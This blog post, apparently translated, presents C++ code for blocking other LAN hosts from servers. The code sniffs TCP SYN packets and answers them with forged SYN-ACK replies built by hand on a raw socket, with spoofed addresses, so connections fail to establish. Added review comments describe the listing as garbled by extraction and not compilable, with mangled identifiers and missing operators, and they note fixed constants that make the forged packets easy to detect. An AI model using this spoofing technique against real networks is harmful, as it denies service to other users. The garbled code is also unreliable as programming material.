Have you ever wondered how to stop other hosts on a LAN from reaching a web server, POP3 server, FTP server and so on? How would you block them? As everyone knows, TCP is connection-oriented: a connection is only established once the three-way handshake has completed. So it should be possible to forge the server's reply right after the first handshake packet (the SYN), so that the TCP connection fails to establish and the service cannot be reached.
The procedure is as follows:
// NOTE(review): this listing was damaged by extraction/machine translation.
// Identifier case is inconsistent (buf/BUF, piphdr/pIPhdr, sendbuf/sendBuf),
// several binary operators between operands are missing (e.g. "BUF iiphlen",
// "IACK 1", "PTR 1"), and some comments were fused with the statement that
// followed them. The code is laid out one statement per line below, but the
// code text itself is left exactly as extracted; it does not compile as shown.

// decodeip: inspects one captured IP packet and, when the size/protocol/flag
// test below matches, calls sendTCP_SYNACK with the source and destination
// swapped and the sequence number taken from the captured TCP header.
void decodeip (buf, ibufsize) // parse a captured IP packet
{
    ipHeader * piphdr;
    tcpheader * ptcphdr;
    piphdr = (ipheader *) BUF;
    // Locate the start of the TCP header from the IP header-length field.
    // NOTE(review): as extracted, the length computation and the pointer
    // offset on the next two lines are not well-formed - confirm against the
    // original listing.
    int Iiphlen = Sizeof (piphdr-> h_lenver & 0xf);
    ptcphdr = (tcpHeader *) (BUF iiphlen);
    // Decide whether this is the first handshake packet: a 48-byte TCP packet
    // whose flag byte equals 2 (SYN only, "-S----").
    // NOTE(review): th_flag is read through the IP-header pointer here, and
    // szDestIP / szSourceIP are not declared anywhere in the visible text.
    if (iBufSize == 48) && (pIPhdr-> iProtocol == IPPROTO_TCP) && (pIPhdr-> th_flag == 2) sendTCP_SYNACK (szDestIP, szSourceIP, pTCPhdr-> destPort, pTCPhdr-> srcPort, pTCPhdr -> seq);
}

// sendTCP_SYNACK: builds one 44-byte IP+TCP packet by hand (IP header, a
// 24-byte TCP header including one 4-byte option) and sends it on a raw socket
// with IP_HDRINCL set, so the source address and ports are whatever the caller
// passes in.
//   szSrcIP / szDestIP   - dotted-quad strings passed to inet_addr()
//   srcPort / destPort   - ports written into the TCP header via htons()
//   iAck                 - value the acknowledgement number is derived from
// NOTE(review): the function is declared void but returns FALSE/true, and it
// uses new[]/delete[], so this is C++ rather than C.
// Detection note: every packet built here carries the same IP identification
// (17393), the same sequence number (0x581A784D), a 65535 window and the same
// MSS option bytes (02 04 05 B4). Those constants are fixed in the code below,
// which makes the forged replies easy to fingerprint in a packet capture or an
// IDS rule. Opening a raw socket normally requires administrative privileges
// on the sending host.
void sendTCP_SYNACK (char * szSrcIP, char * szDestIP, unsigned short srcPort, unsigned short destPort, unsigned int iAck)
{
    int iErrorCode;
    SOCKET s;
    IP_HEADER ip_header;
    TCP_HEADER tcp_header;
    pSD_HEADER psd_header;
    struct sockaddr_in remote;
    char * ptr = NULL;
    // Create the raw socket.
    s = socket (AF_INET, SOCK_RAW, IPPROTO_IP);
    if (CheckSockError (s, "socket-tcp")) return FALSE;
    // IP_HDRINCL: the caller supplies the complete IP header itself.
    BOOL bOpt = TRUE;
    iErrorCode = setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *) & bopt, sizeof (bopt));
    if (CHECKSockerror (IerrorCode, "SetsockOpt-TCP")) {
        CloseSocket (s);
        returnafke;
    }
    // --- end of socket setup ---
    // Forged handshake reply: 44 bytes in total, 24 of them TCP header+option.
    // Both early returns above happen before this allocation.
    unsigned short itotals Ize = 44;
    unsigned short itcpsize = 24;
    char * sendbuf = new char [itotalsize];
    // Fill the IP header.
    ip_header.h_lenver = (4 << 4 | sizeof (ip_header) / sizeof (unsigned long); // high nibble: version, low nibble: header length
    ip_header.total_len = htons (itotalsize); // 16-bit total length
    ip_header.tos = 0;
    ip_header.Ident = htons (17393); // 16-bit identification (original comment mis-encoded); constant for every packet
    i_Header.Frag_and_Flags=0; // fragment/flags field (original comment mis-encoded)
    // NOTE(review): the text that followed here is mis-encoded beyond
    // recovery; any further IP header-field assignments that stood at this
    // point are not visible in this listing.
    IP_HEADER.CHECKSUM = 0; // 16-bit checksum, zeroed before it is computed
    ip_header.sourceIP = inet_addr (szsrcip); // 32-bit source address
    ip_header.destip = inet_addr (szdestip); // 32-bit destination address
    // IP header checksum over 20 bytes.
    IP_HEADER. Checksum =
checksum ((USHORT *) & ip_header, 20);
    // Fill the TCP header.
    tcp_header.th_sport = htons (srcPort); // source port
    tcp_header.th_dport = htons (destPort); // destination port
    tcp_header.th_seq = htonl (0x581A784D) ; // sequence number; hard-coded constant
    TCP_HENER.TH_ACK = HTONL (IACK 1); // acknowledgement number, derived from iAck (operator lost in extraction)
    TCP_HEADER.TH_LENRES = (ITCPSIZE / SIZEOF (Unsigned long) << 4 | 0); // TCP header length and reserved bits
    TCP_HEADER.TH_FLAG = 0x12; // flag byte 0x12 = SYN|ACK (the original comment said only "SYN flag")
    TCP_HEADER.TH_WIN = HTONS (65535); // window size
    TCP_HEADER.TH_URP = 0; // urgent pointer
    TCP_HEADER.TH_SUM = 0; // checksum, zeroed before it is computed
    // Fill the TCP pseudo-header (used only while computing the checksum).
    psd_header.saddr = ip_header.sourceIP;
    psd_header.daddr = ip_header.destIP;
    psd_header.mbz = 0;
    psd_header.ptcl = IPPROTO_TCP;
    psd_header.tcpl = htons (iTCPSize);
    ZeroMemory (sendBuf, iTotalSize);
    // Compute the TCP checksum over pseudo-header + TCP header + option bytes,
    // staged in the send buffer.
    // NOTE(review): presumably the pseudo-header plus 24 bytes fits inside the
    // 44-byte buffer; the pseudo-header struct is not shown - verify.
    memcpy (sendBuf, & psd_header, sizeof (psd_header));
    ptr = sendBuf sizeof (psd_header);
    memcpy (ptr, & tcp_header, sizeof (tcp_header));
    ptr = sendBuf sizeof ( PSD_HEADER) SIZEOF (TCP_HEADER);
    // TCP option: kind 2 (maximum segment size), length 4, value 0x05B4 (1460).
    * PTR = (char) 0x02;
    * (PTR 1) = (char) 0x04;
    * (PTR 2) = (char) 0x05;
    * (PTR 3) = (char) 0xB4;
    TCP_HEADER.TH_SUM = Checksum ((Ushort *) sendbuf, sizeof (psd_header) 24);
    ZeromeMory (Sendbuf, ITAtalsize);
    // Fill the send buffer with the real packet: IP header, TCP header, then
    // the same four option bytes.
    Memcpy (sendbuf, & ip_header, sizeof (ip_header));
    ptr = sendBuf sizeof (ip_header);
    memcpy (ptr, & tcp_header, sizeof (tcp_header));
    ptr = sendBuf sizeof (ip_header) sizeof (tcp_header);
    * ptr = (char) 0x02 ;
    * (PTR 1) = (char) 0x04;
    * (PTR 2) = (char) 0x05;
    * (PTR 3) = (char) 0xB4;
    Remote.sin_Family = AF_INET;
    Remote.sin_Port = Htons (Destport );
    remote.sin_addr.s_addr = inet_addr (szDestIP);
    iErrorCode = sendto (s, sendBuf, iTotalSize, 0, (SOCKADDR *) & remote, sizeof (remote));
    // The send result is passed to the error checker, but its return value is
    // not acted on.
    CheckSockError (iErrorCode, "SYNACK sendto");
    // "Forged close connection" section.
    // NOTE(review): only these two size assignments survive in the listing;
    // whatever packet-building code followed them appears to have been cut.
    hoodsize = 40;
    itcpsize = 20;
    // --- end ---
    CloseSocket (s);
    delete [] sendbuf;
    return true;
}
Author Blog:
http://blog.9cbs.net/amh/